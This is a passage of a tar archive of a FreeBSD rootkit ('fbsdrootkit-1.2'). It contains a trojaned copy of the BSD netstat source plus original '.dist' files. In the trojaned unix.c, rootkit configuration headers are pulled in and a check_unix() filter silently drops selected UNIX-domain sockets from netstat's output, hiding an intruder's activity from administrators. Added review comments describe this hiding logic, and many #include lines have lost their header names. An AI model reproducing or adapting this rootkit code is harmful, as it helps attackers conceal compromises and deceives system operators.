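	register u_char *q;

	work = sns->sns_addr;
	port = ntohs(work.x_port);
	work.x_port = 0;
	net.net_e = work.x_net;
	if (ns_nullhost(work) && net.long_e == 0) {
		if (port ) {
			sprintf(mybuf, "*.%xH", port);
			upHex(mybuf);
		} else
			sprintf(mybuf, "*.*");
		return (mybuf);
	}

	if (bcmp(ns_bh, work.x_host.c_host, 6) == 0) {
		host = "any";
	} else if (bcmp(ns_nullh, work.x_host.c_host, 6) == 0) {
		host = "*";
	} else {
		q = work.x_host.c_host;
		sprintf(chost, "%02x%02x%02x%02x%02x%02xH",
		    q[0], q[1], q[2], q[3], q[4], q[5]);
		/* skip leading zeros of the 12 hex digits */
		for (p = chost; *p == '0' && p < chost + 12; p++)
			continue;
		host = p;
	}
	if (port)
		sprintf(cport, ".%xH", htons(port));
	else
		*cport = 0;

	sprintf(mybuf,"%xH.%s%s", ntohl(net.long_e), host, cport);
	upHex(mybuf);
	return(mybuf);
}

/*
 * ns_phost -- like ns_print() but for the host part only: net and
 * port are zeroed first and the resulting "0H." prefix is skipped.
 */
char *
ns_phost(sa)
	struct sockaddr *sa;
{
	register struct sockaddr_ns *sns = (struct sockaddr_ns *)sa;
	struct sockaddr_ns work;
	static union ns_net ns_zeronet;
	char *p;

	work = *sns;
	work.sns_addr.x_port = 0;
	work.sns_addr.x_net = ns_zeronet;

	p = ns_print((struct sockaddr *)&work);
	if (strncmp("0H.", p, 3) == 0)
		p += 3;
	return(p);
}

/*
 * upHex -- convert the hex digits a-f in `p0' to upper case in place.
 */
void
upHex(p0)
	char *p0;
{
	register char *p = p0;

	for (; *p; p++)
		switch (*p) {
		case 'a':
		case 'b':
		case 'c':
		case 'd':
		case 'e':
		case 'f':
			*p += ('A' - 'a');
		}
}
fbsdrootkit-1.2/netstat/unix.c100600 764 0 10611 6257602116 14301 0ustar dfroot/*-
 * Copyright (c) 1983, 1988, 1993
 * The Regents of the University of California. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 * notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 * notice, this list of conditions and the following disclaimer in the
 * documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 * must display the following acknowledgement:
 * This product includes software developed by the University of
 * California, Berkeley and its contributors.
 * 4.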
Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)unix.c 8.1 (Berkeley) 6/6/93"; #endif /* not lint */ /* * Display protocol blocks in the unix domain. 
*/
/*
 * NOTE(review): the header names of the bare #include lines in this
 * file are missing from this copy of the text.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define KERNEL
struct uio;
struct proc;
#include
#include
#include
#include
#include "netstat.h"

/* Rootkit configuration files */
/*
 * NOTE(review): these two headers are not part of this excerpt.
 * showall and check_unix(), used by unixdomainpr() below, are not
 * defined in this file and presumably come from them -- confirm.
 */
#include "../config.h"
#define UNIX_DOT_C
#include "../rootkitnetstat.h"

static void unixdomainpr __P((struct socket *, caddr_t));

static struct file *file, *fileNFILE;
static int nfiles;
extern kvm_t *kvmd;

/*
 * unixpr -- walk the kernel file table obtained with kvm_getfiles()
 * and hand every in-use socket whose so_proto lies in
 * [unixsw, unixsw + 2] to unixdomainpr().
 *
 * off: kernel address used as the base of that protosw range.
 */
void
unixpr(off)
	u_long off;
{
	register struct file *fp;
	struct socket sock, *so = &sock;
	char *filebuf;
	struct protosw *unixsw = (struct protosw *)off;

	filebuf = (char *)kvm_getfiles(kvmd, KERN_FILE, 0, &nfiles);
	if (filebuf == 0) {
		printf("Out of memory (file table).\n");
		return;
	}
	/* the file entries start sizeof(fp), i.e. one pointer, into the buffer */
	file = (struct file *)(filebuf + sizeof(fp));
	fileNFILE = file + nfiles;
	for (fp = file; fp < fileNFILE; fp++) {
		if (fp->f_count == 0 || fp->f_type != DTYPE_SOCKET)
			continue;
		/* kread() returns non-zero on failure: skip unreadable entries */
		if (kread((u_long)fp->f_data, (char *)so, sizeof (*so)))
			continue;
		/* kludge */
		if (so->so_proto >= unixsw && so->so_proto <= unixsw + 2)
			if (so->so_pcb)
				unixdomainpr(so, fp->f_data);
	}
}

/* indexed by so_type; NOTE(review): the index is not range-checked below */
static char *socktype[] =
    { "#0", "stream", "dgram", "raw", "rdm", "seqpacket" };

/*
 * unixdomainpr -- print one UNIX-domain socket row (header first, on
 * the first call).
 *
 * so:     local copy of the kernel socket structure.
 * soaddr: kernel address of that socket, shown in the first column.
 *
 * The row is printed only when the filter near the end of the function
 * passes, so the listing produced by a binary built from this file is
 * not a complete view of the kernel's socket table.
 */
static void
unixdomainpr(so, soaddr)
	register struct socket *so;
	caddr_t soaddr;
{
	struct unpcb unpcb, *unp = &unpcb;
	struct mbuf mbuf, *m;
	struct sockaddr_un *sa;
	static int first = 1;

	if (kread((u_long)so->so_pcb, (char *)unp, sizeof (*unp)))
		return;
	if (unp->unp_addr) {
		m = &mbuf;
		if (kread((u_long)unp->unp_addr, (char *)m, sizeof (*m)))
			m = (struct mbuf *)0;
		/* NOTE(review): evaluated even when m was just set to NULL;
		 * sa is only dereferenced below when m is non-NULL */
		sa = (struct sockaddr_un *)(m->m_dat);
	} else
		m = (struct mbuf *)0;
	if (first) {
		printf("Active UNIX domain sockets\n");
		printf(
"%-8.8s %-6.6s %-6.6s %-6.6s %8.8s %8.8s %8.8s %8.8s Addr\n",
		    "Address", "Type", "Recv-Q", "Send-Q",
		    "Inode", "Conn", "Refs", "Nextref");
		first = 0;
	}

	/* If socket has a pathname check to see if it should be blocked. */
	/*
	 * Parses as showall || (m && !check_unix(path)).  With showall
	 * clear, a row is dropped when check_unix() returns non-zero for
	 * the path, and also when the socket has no bound address (m is
	 * NULL).  The "Active UNIX domain sockets" header above is still
	 * printed in either case.
	 */
	if(showall || m && !check_unix(sa->sun_path)) {
		printf("%8x %-6.6s %6d %6d %8x %8x %8x %8x",
		    soaddr, socktype[so->so_type], so->so_rcv.sb_cc,
		    so->so_snd.sb_cc,
		    unp->unp_vnode, unp->unp_conn,
		    unp->unp_refs, unp->unp_nextref);
		if (m)
			/* precision = m_len minus the sockaddr_un header bytes */
			printf(" %.*s",
			    m->m_len - (int)(sizeof(*sa) - sizeof(sa->sun_path)),
			    sa->sun_path);
		putchar('\n');
	}
}
fbsdrootkit-1.2/netstat/main.c.dist100600 764 0 27351 6256121712 15212 0ustar dfroot/*
 * Copyright (c) 1983, 1988, 1993
 * Regents of the University of California. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 * notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 * notice, this list of conditions and the following disclaimer in the
 * documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 * must display the following acknowledgement:
 * This product includes software developed by the University of
 * California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 * may be used to endorse or promote products derived from this software
 * without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.
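IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

#ifndef lint
char copyright[] =
"@(#) Copyright (c) 1983, 1988, 1993\n\
 Regents of the University of California. All rights reserved.\n";
#endif /* not lint */

#ifndef lint
static char sccsid[] = "@(#)main.c 8.4 (Berkeley) 3/1/94";
#endif /* not lint */

/*
 * NOTE(review): the header names of the bare #include lines below are
 * missing from this copy of the text.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "netstat.h"

/*
 * Kernel symbols resolved with kvm_nlist(); each N_* constant is the
 * index of the entry that follows it.
 */
struct nlist nl[] = {
#define N_MBSTAT 0
	{ "_mbstat" },
#define N_IPSTAT 1
	{ "_ipstat" },
#define N_TCB 2
	{ "_tcb" },
#define N_TCPSTAT 3
	{ "_tcpstat" },
#define N_UDB 4
	{ "_udb" },
#define N_UDPSTAT 5
	{ "_udpstat" },
#define N_IFNET 6
	{ "_ifnet" },
#define N_IMP 7
	{ "_imp_softc" },
#define N_ICMPSTAT 8
	{ "_icmpstat" },
#define N_RTSTAT 9
	{ "_rtstat" },
#define N_UNIXSW 10
	{ "_localsw" },
#define N_IDP 11
	{ "_nspcb"},
#define N_IDPSTAT 12
	{ "_idpstat"},
#define N_SPPSTAT 13
	{ "_spp_istat"},
#define N_NSERR 14
	{ "_ns_errstat"},
#define N_CLNPSTAT 15
	{ "_clnp_stat"},
#define IN_NOTUSED 16
	{ "_tp_inpcb" },
#define ISO_TP 17
	{ "_tp_refinfo" },
#define N_TPSTAT 18
	{ "_tp_stat" },
#define N_ESISSTAT 19
	{ "_esis_stat"},
#define N_NIMP 20
	{ "_nimp"},
#define N_RTREE 21
	{ "_rt_tables"},
#define N_CLTP 22
	{ "_cltb"},
#define N_CLTPSTAT 23
	{ "_cltpstat"},
#define N_NFILE 24
	{ "_nfile" },
#define N_FILE 25
	{ "_file" },
#define N_IGMPSTAT 26
	{ "_igmpstat" },
#define N_MRTPROTO 27
	{ "_ip_mrtproto" },
#define N_MRTSTAT 28
	{ "_mrtstat" },
#define N_MFCTABLE 29
	{ "_mfctable" },
#define N_VIFTABLE 30
	{ "_viftable" },
	"",
};

struct protox {
	u_char pr_index; /* index into nlist of cb head */
	u_char pr_sindex; /* index into nlist of stat block */
	u_char pr_wanted; /* 1 if wanted, 0 otherwise */
	void (*pr_cblocks)(); /* control blocks printing routine */
	void (*pr_stats)(); /* statistics printing routine */
	char *pr_name; /* well-known name */
} protox[] = {
	{ N_TCB, N_TCPSTAT, 1, protopr,
	  tcp_stats, "tcp" },
	{ N_UDB, N_UDPSTAT, 1, protopr,
	  udp_stats, "udp" },
	{ -1, N_IPSTAT, 1, 0,
	  ip_stats, "ip" },
	{ -1, N_ICMPSTAT, 1, 0,
	  icmp_stats, "icmp" },
	{ -1, N_IGMPSTAT, 1, 0,
	  igmp_stats, "igmp" },
	{ -1, -1, 0, 0,
	  0, 0 }
};

struct protox nsprotox[] = {
	{ N_IDP, N_IDPSTAT, 1, nsprotopr,
	  idp_stats, "idp" },
	{ N_IDP, N_SPPSTAT, 1, nsprotopr,
	  spp_stats, "spp" },
	{ -1, N_NSERR, 1, 0,
	  nserr_stats, "ns_err" },
	{ -1, -1, 0, 0,
	  0, 0 }
};

struct protox isoprotox[] = {
	{ ISO_TP, N_TPSTAT, 1, iso_protopr,
	  tp_stats, "tp" },
	{ N_CLTP, N_CLTPSTAT, 1, iso_protopr,
	  cltp_stats, "cltp" },
	{ -1, N_CLNPSTAT, 1, 0,
	  clnp_stats, "clnp"},
	{ -1, N_ESISSTAT, 1, 0,
	  esis_stats, "esis"},
	{ -1, -1, 0, 0,
	  0, 0 }
};

struct protox *protoprotox[] = { protox, nsprotox, isoprotox, NULL };

static void printproto __P((struct protox *, char *));
static void usage __P((void));
static struct protox *name2protox __P((char *));
static struct protox *knownname __P((char *));

kvm_t *kvmd;

/*
 * main -- parse the options, open the kernel (or the -M/-N files)
 * through kvm, resolve nl[] and dispatch to the requested display.
 * Every display path ends in exit().
 */
int
main(argc, argv)
	int argc;
	char *argv[];
{
	extern char *optarg;
	extern int optind;
	register struct protoent *p;
	register struct protox *tp = NULL; /* for printing cblocks & stats */
	register char *cp;
	int ch;
	char *nlistf = NULL, *memf = NULL;
	char buf[_POSIX2_LINE_MAX];

	if (cp = rindex(argv[0], '/'))
		prog = cp + 1;
	else
		prog = argv[0];
	af = AF_UNSPEC;

	while ((ch = getopt(argc, argv, "Aabdf:ghI:iM:mN:np:rstuw:")) != EOF)
		switch(ch) {
		case 'A':
			Aflag = 1;
			break;
		case 'a':
			aflag = 1;
			break;
		case 'b':
			bflag = 1;
			break;
		case 'd':
			dflag = 1;
			break;
		case 'f':
			if (strcmp(optarg, "ns") == 0)
				af = AF_NS;
			else if (strcmp(optarg, "inet") == 0)
				af = AF_INET;
			else if (strcmp(optarg, "unix") == 0)
				af = AF_UNIX;
			else if (strcmp(optarg, "iso") == 0)
				af = AF_ISO;
			else {
				errx(1, "%s: unknown address family", optarg);
			}
			break;
		case 'g':
			gflag = 1;
			break;
		case 'I': {
			char *cp;

			iflag = 1;
			/* <ctype.h> takes an unsigned char value, not a plain char */
			for (cp = interface = optarg;
			    isalpha((unsigned char)*cp); cp++)
				continue;
			unit = atoi(cp);
			break;
		}
		case 'i':
			iflag = 1;
			break;
		case 'M':
			memf = optarg;
			break;
		case 'm':
			mflag = 1;
			break;
		case 'N':
			nlistf = optarg;
			break;
		case 'n':
			nflag = 1;
			break;
		case 'p':
			if ((tp = name2protox(optarg)) == NULL) {
				errx(1,
				    "%s: unknown or uninstrumented protocol",
				    optarg);
			}
			pflag = 1;
			break;
		case 'r':
			rflag = 1;
			break;
		case 's':
			++sflag;
			break;
		case 't':
			tflag = 1;
			break;
		case 'u':
			af = AF_UNIX;
			break;
		case 'w':
			interval = atoi(optarg);
			iflag = 1;
			break;
		case '?':
		default:
			usage();
		}
	argv += optind;
	argc -= optind;

#define BACKWARD_COMPATIBILITY
#ifdef BACKWARD_COMPATIBILITY
	if (*argv) {
		if (isdigit((unsigned char)**argv)) {
			interval = atoi(*argv);
			if (interval <= 0)
				usage();
			++argv;
			iflag = 1;
		}
		if (*argv) {
			nlistf = *argv;
			if (*++argv)
				memf = *argv;
		}
	}
#endif

	/*
	 * Discard setgid privileges if not the running kernel so that bad
	 * guys can't print interesting stuff from kernel memory.
	 */
	if (nlistf != NULL || memf != NULL) {
		/*
		 * Fail closed: going on after a failed setgid() would open
		 * the caller-supplied files with the privileged group.
		 */
		if (setgid(getgid()) != 0)
			err(1, "setgid");
	}

	kvmd = kvm_openfiles(nlistf, memf, NULL, O_RDONLY, buf);
	if (kvmd == NULL) {
		errx(1, "kvm_open: %s", buf);
	}
	if (kvm_nlist(kvmd, nl) < 0) {
		if(nlistf)
			errx(1, "%s: kvm_nlist: %s", nlistf, kvm_geterr(kvmd));
		else
			errx(1, "kvm_nlist: %s", kvm_geterr(kvmd));
	}

	if (nl[0].n_type == 0) {
		if(nlistf)
			errx(1, "%s: no namelist", nlistf);
		else
			errx(1, "no namelist");
	}
	if (mflag) {
		mbpr(nl[N_MBSTAT].n_value);
		exit(0);
	}
	if (pflag) {
		/* pflag is only set after name2protox() returned non-NULL */
		if (tp->pr_stats)
			(*tp->pr_stats)(nl[tp->pr_sindex].n_value,
			    tp->pr_name);
		else
			printf("%s: no stats routine\n", tp->pr_name);
		exit(0);
	}
#if 0
	/*
	 * Keep file descriptors open to avoid overhead
	 * of open/close on each call to get* routines.
	 */
	sethostent(1);
	setnetent(1);
#else
	/*
	 * This does not make sense any more with DNS being default over
	 * the files. Doing a setXXXXent(1) causes a tcp connection to be
	 * used for the queries, which is slower.
	 */
#endif
	if (iflag) {
		intpr(interval, nl[N_IFNET].n_value);
		exit(0);
	}
	if (rflag) {
		if (sflag)
			rt_stats(nl[N_RTSTAT].n_value);
		else
			routepr(nl[N_RTREE].n_value);
		exit(0);
	}
	if (gflag) {
		if (sflag)
			mrt_stats(nl[N_MRTPROTO].n_value,
			    nl[N_MRTSTAT].n_value);
		else
			mroutepr(nl[N_MRTPROTO].n_value,
			    nl[N_MFCTABLE].n_value,
			    nl[N_VIFTABLE].n_value);
		exit(0);
	}
	if (af == AF_INET || af == AF_UNSPEC) {
		setprotoent(1);
		setservent(1);
		/* ugh, this is O(MN) ... why do we do this? */
		while (p = getprotoent()) {
			for (tp = protox; tp->pr_name; tp++)
				if (strcmp(tp->pr_name, p->p_name) == 0)
					break;
			if (tp->pr_name == 0 || tp->pr_wanted == 0)
				continue;
			printproto(tp, p->p_name);
		}
		endprotoent();
	}
	if (af == AF_NS || af == AF_UNSPEC)
		for (tp = nsprotox; tp->pr_name; tp++)
			printproto(tp, tp->pr_name);
	if (af == AF_ISO || af == AF_UNSPEC)
		for (tp = isoprotox; tp->pr_name; tp++)
			printproto(tp, tp->pr_name);
	if ((af == AF_UNIX || af == AF_UNSPEC) && !sflag)
		unixpr(nl[N_UNIXSW].n_value);
	exit(0);
}

/*
 * Print out protocol statistics or control blocks (per sflag).
 * If the interface was not specifically requested, and the symbol
 * is not in the namelist, ignore this one.
 */
static void
printproto(tp, name)
	register struct protox *tp;
	char *name;
{
	void (*pr)();
	u_long off;

	if (sflag) {
		pr = tp->pr_stats;
		off = nl[tp->pr_sindex].n_value;
	} else {
		pr = tp->pr_cblocks;
		off = nl[tp->pr_index].n_value;
	}
	if (pr != NULL && (off || af != AF_UNSPEC))
		(*pr)(off, name);
}

/*
 * Read kernel memory, return 0 on success.
 * On a short or failed read a warning is printed and -1 is returned;
 * the contents of buf must not be used in that case.
 */
int
kread(addr, buf, size)
	u_long addr;
	char *buf;
	int size;
{

	if (kvm_read(kvmd, addr, buf, size) != size) {
		warnx("%s", kvm_geterr(kvmd));
		return (-1);
	}
	return (0);
}

/* plural -- return "s" unless n is 1. */
char *
plural(n)
	int n;
{
	return (n != 1 ? "s" : "");
}

/* plurales -- return "es" unless n is 1. */
char *
plurales(n)
	int n;
{
	return (n != 1 ? "es" : "");
}

/*
 * Find the protox for the given "well-known" name.
 */
static struct protox *
knownname(name)
	char *name;
{
	struct protox **tpp, *tp;

	for (tpp = protoprotox; *tpp; tpp++)
		for (tp = *tpp; tp->pr_name; tp++)
			if (strcmp(tp->pr_name, name) == 0)
				return (tp);
	return (NULL);
}

/*
 * Find the protox corresponding to name.
 */
static struct protox *
name2protox(name)
	char *name;
{
	struct protox *tp;
	char **alias; /* alias from p->aliases */
	struct protoent *p;

	/*
	 * Try to find the name in the list of "well-known" names. If that
	 * fails, check if name is an alias for an Internet protocol.
	 */
	if (tp = knownname(name))
		return (tp);

	setprotoent(1); /* make protocol lookup cheaper */
	while (p = getprotoent()) {
		/* assert: name not same as p->name */
		for (alias = p->p_aliases; *alias; alias++)
			if (strcmp(name, *alias) == 0) {
				endprotoent();
				return (knownname(p->p_name));
			}
	}
	endprotoent();
	return (NULL);
}

/* usage -- print the synopsis on stderr and exit with status 1. */
static void
usage()
{
	(void)fprintf(stderr,
"usage: %s [-Aan] [-f address_family] [-M core] [-N system]\n", prog);
	(void)fprintf(stderr,
" %s [-bdghimnrs] [-f address_family] [-M core] [-N system]\n", prog);
	(void)fprintf(stderr,
" %s [-bdn] [-I interface] [-M core] [-N system] [-w wait]\n", prog);
	(void)fprintf(stderr,
" %s [-M core] [-N system] [-p protocol]\n", prog);
	exit(1);
}

/*
 * trimdomain -- cut the local domain off the host name `cp' in place.
 * The local domain is taken once from gethostname(): everything after
 * the first dot.
 */
void
trimdomain(cp)
	char *cp;
{
	static char domain[MAXHOSTNAMELEN + 1];
	static int first = 1;
	char *s;

	if (first) {
		first = 0;
		if (gethostname(domain, MAXHOSTNAMELEN) == 0 &&
		    (s = strchr(domain, '.')))
			/* source and destination overlap: strcpy is undefined here */
			(void) memmove(domain, s + 1, strlen(s + 1) + 1);
		else
			domain[0] = 0;
	}

	if (domain[0]) {
		while ((cp = strchr(cp, '.'))) {
			if (!strcasecmp(cp + 1, domain)) {
				*cp = 0; /* hit it */
				break;
			} else {
				cp++;
			}
		}
	}
}
fbsdrootkit-1.2/netstat/inet.c.dist100600 764 0 37371 6256125447 15241 0ustar dfroot/*
 * Copyright (c) 1983, 1988, 1993, 1995
 * The Regents of the University of California. All rights reserved.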
* * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
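*/

#ifndef lint
static char sccsid[] = "@(#)inet.c 8.5 (Berkeley) 5/24/95";
#endif /* not lint */

/*
 * NOTE(review): the header names of the bare #include lines below are
 * missing from this copy of the text.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define TCPSTATES
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "netstat.h"

/* scratch copies of the kernel structures read by protopr() */
struct inpcb inpcb;
struct tcpcb tcpcb;
struct socket sockb;

char *inetname __P((struct in_addr *));
void inetprint __P((struct in_addr *, int, char *, int));

/*
 * Print a summary of connections related to an Internet
 * protocol. For TCP, also give state of connection.
 * Listening processes (aflag) are suppressed unless the
 * -a (all) flag is specified.
 *
 * off:  kernel address of the protocol's inpcb list head (0: nothing
 *       to print).
 * name: protocol name; "tcp" additionally reads and prints the tcpcb.
 */
void
protopr(off, name)
	u_long off;
	char *name;
{
	struct inpcbhead head;
	register struct inpcb *next;
	int istcp;
	static int first = 1;

	if (off == 0)
		return;
	istcp = strcmp(name, "tcp") == 0;
	/* without the list head there is no valid first pointer to follow */
	if (kread(off, (char *)&head, sizeof (struct inpcbhead)))
		return;
	for (next = head.lh_first; next != NULL;
	    next = inpcb.inp_list.le_next) {
		if (kread((u_long)next, (char *)&inpcb, sizeof (inpcb))) {
			printf("???\n");
			break;
		}
		/* wildcard local address: a listener, shown only with -a */
		if (!aflag && inet_lnaof(inpcb.inp_laddr) == INADDR_ANY)
			continue;
		if (kread((u_long)inpcb.inp_socket, (char *)&sockb,
		    sizeof (sockb))) {
			printf("???\n");
			break;
		}
		if (istcp) {
			if (kread((u_long)inpcb.inp_ppcb, (char *)&tcpcb,
			    sizeof (tcpcb))) {
				printf("???\n");
				break;
			}
		}
		if (first) {
			printf("Active Internet connections");
			if (aflag)
				printf(" (including servers)");
			putchar('\n');
			if (Aflag)
				printf("%-8.8s ", "PCB");
			printf(Aflag ?
			    "%-5.5s %-6.6s %-6.6s %-18.18s %-18.18s %s\n" :
			    "%-5.5s %-6.6s %-6.6s %-22.22s %-22.22s %s\n",
			    "Proto", "Recv-Q", "Send-Q",
			    "Local Address", "Foreign Address", "(state)");
			first = 0;
		}
		if (Aflag) {
			/* -A column: the tcpcb address for TCP, else the inpcb */
			if (istcp)
				printf("%8x ", (int)inpcb.inp_ppcb);
			else
				printf("%8x ", (int)next);
		}
		printf("%-5.5s %6ld %6ld ", name, sockb.so_rcv.sb_cc,
		    sockb.so_snd.sb_cc);
		if (nflag) {
			inetprint(&inpcb.inp_laddr, (int)inpcb.inp_lport,
			    name, 1);
			inetprint(&inpcb.inp_faddr, (int)inpcb.inp_fport,
			    name, 1);
		} else {
			inetprint(&inpcb.inp_laddr, (int)inpcb.inp_lport,
			    name, 0);
			inetprint(&inpcb.inp_faddr, (int)inpcb.inp_fport,
			    name,
			    inpcb.inp_lport != inpcb.inp_fport);
		}
		if (istcp) {
			/* the state comes from kernel memory: range-check it */
			if (tcpcb.t_state < 0 || tcpcb.t_state >= TCP_NSTATES)
				printf(" %d", tcpcb.t_state);
			else {
				printf(" %s", tcpstates[tcpcb.t_state]);
#if defined(TF_NEEDSYN) && defined(TF_NEEDFIN)
				/* Show T/TCP `hidden state' */
				if (tcpcb.t_flags & (TF_NEEDSYN|TF_NEEDFIN))
					putchar('*');
#endif /* defined(TF_NEEDSYN) && defined(TF_NEEDFIN) */
			}
		}
		putchar('\n');
	}
}

/*
 * Dump TCP statistics structure.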
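*/
/*
 * off:  kernel address of struct tcpstat (0: print nothing).
 * name: heading printed before the counters.
 *
 * A counter is printed when it is non-zero or when sflag <= 1.
 */
void
tcp_stats(off, name)
	u_long off;
	char *name;
{
	struct tcpstat tcpstat;

	if (off == 0)
		return;
	printf ("%s:\n", name);
	/* kread() has already warned; do not print an uninitialized struct */
	if (kread(off, (char *)&tcpstat, sizeof (tcpstat)))
		return;

#define p(f, m) do { \
	if (tcpstat.f || sflag <= 1) \
		printf(m, tcpstat.f, plural(tcpstat.f)); \
} while (0)
#define p2(f1, f2, m) do { \
	if (tcpstat.f1 || tcpstat.f2 || sflag <= 1) \
		printf(m, tcpstat.f1, plural(tcpstat.f1), \
		    tcpstat.f2, plural(tcpstat.f2)); \
} while (0)
#define p3(f, m) do { \
	if (tcpstat.f || sflag <= 1) \
		printf(m, tcpstat.f, plurales(tcpstat.f)); \
} while (0)

	p(tcps_sndtotal, "\t%ld packet%s sent\n");
	p2(tcps_sndpack,tcps_sndbyte,
	    "\t\t%ld data packet%s (%ld byte%s)\n");
	p2(tcps_sndrexmitpack, tcps_sndrexmitbyte,
	    "\t\t%ld data packet%s (%ld byte%s) retransmitted\n");
	p(tcps_mturesent, "\t\t%ld resend%s initiated by MTU discovery\n");
	p2(tcps_sndacks, tcps_delack,
	    "\t\t%ld ack-only packet%s (%ld delayed)\n");
	p(tcps_sndurg, "\t\t%ld URG only packet%s\n");
	p(tcps_sndprobe, "\t\t%ld window probe packet%s\n");
	p(tcps_sndwinup, "\t\t%ld window update packet%s\n");
	p(tcps_sndctrl, "\t\t%ld control packet%s\n");
	p(tcps_rcvtotal, "\t%ld packet%s received\n");
	p2(tcps_rcvackpack, tcps_rcvackbyte,
	    "\t\t%ld ack%s (for %ld byte%s)\n");
	p(tcps_rcvdupack, "\t\t%ld duplicate ack%s\n");
	p(tcps_rcvacktoomuch, "\t\t%ld ack%s for unsent data\n");
	p2(tcps_rcvpack, tcps_rcvbyte,
	    "\t\t%ld packet%s (%ld byte%s) received in-sequence\n");
	p2(tcps_rcvduppack, tcps_rcvdupbyte,
	    "\t\t%ld completely duplicate packet%s (%ld byte%s)\n");
	p(tcps_pawsdrop, "\t\t%ld old duplicate packet%s\n");
	p2(tcps_rcvpartduppack, tcps_rcvpartdupbyte,
	    "\t\t%ld packet%s with some dup. data (%ld byte%s duped)\n");
	p2(tcps_rcvoopack, tcps_rcvoobyte,
	    "\t\t%ld out-of-order packet%s (%ld byte%s)\n");
	p2(tcps_rcvpackafterwin, tcps_rcvbyteafterwin,
	    "\t\t%ld packet%s (%ld byte%s) of data after window\n");
	p(tcps_rcvwinprobe, "\t\t%ld window probe%s\n");
	p(tcps_rcvwinupd, "\t\t%ld window update packet%s\n");
	p(tcps_rcvafterclose, "\t\t%ld packet%s received after close\n");
	p(tcps_rcvbadsum, "\t\t%ld discarded for bad checksum%s\n");
	p(tcps_rcvbadoff,
	    "\t\t%ld discarded for bad header offset field%s\n");
	p(tcps_rcvshort, "\t\t%ld discarded because packet too short\n");
	p(tcps_connattempt, "\t%ld connection request%s\n");
	p(tcps_accepts, "\t%ld connection accept%s\n");
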